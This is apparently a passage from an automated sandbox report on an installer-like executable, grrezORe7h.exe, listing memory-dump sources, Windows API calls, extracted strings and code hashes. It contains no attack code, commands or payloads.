                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                      • API String ID: 2624150263-3131679198
                                                                                                                      • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                      • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                      • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                      • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                      • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                      • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                      • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                      • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                      • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                      • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                      APIs
                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                      • GetSysColor.USER32(?), ref: 00404396
                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                      • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                      • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                      • String ID: -B@$Call$N$open
                                                                                                                      • API String ID: 3615053054-1446803726
                                                                                                                      • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                      • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                      • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                      • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                      • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                      • String ID: F
                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                      • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                      • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                      • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                      • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                      APIs
                                                                                                                      • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                        • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                        • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                      • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                      • wsprintfA.USER32 ref: 00405DFB
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                      • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                        • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                        • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                      • API String ID: 222337774-899692902
                                                                                                                      • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                      • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                      • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                      • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                      APIs
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                      • String ID: @Hmu
                                                                                                                      • API String ID: 4216380887-887474944
                                                                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                      APIs
                                                                                                                      • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                      • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                      • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                      • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                      • "C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 0040632D
                                                                                                                      • *?|<>/":, xrefs: 0040633B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                      • String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 589700163-3473373631
                                                                                                                      • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                      • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                      • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                      • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                      • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                      • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2320649405-0
                                                                                                                      • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                      • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                      • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                      • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                      • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                      • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                      • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2531174081-0
                                                                                                                      • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                      • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                      • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                      • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                      • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                      • String ID: f
                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                      • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                      • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                      • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                      • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                      APIs
                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                      • MulDiv.KERNEL32(00071C30,00000064,00071C34), ref: 00402D4D
                                                                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                      Strings
                                                                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
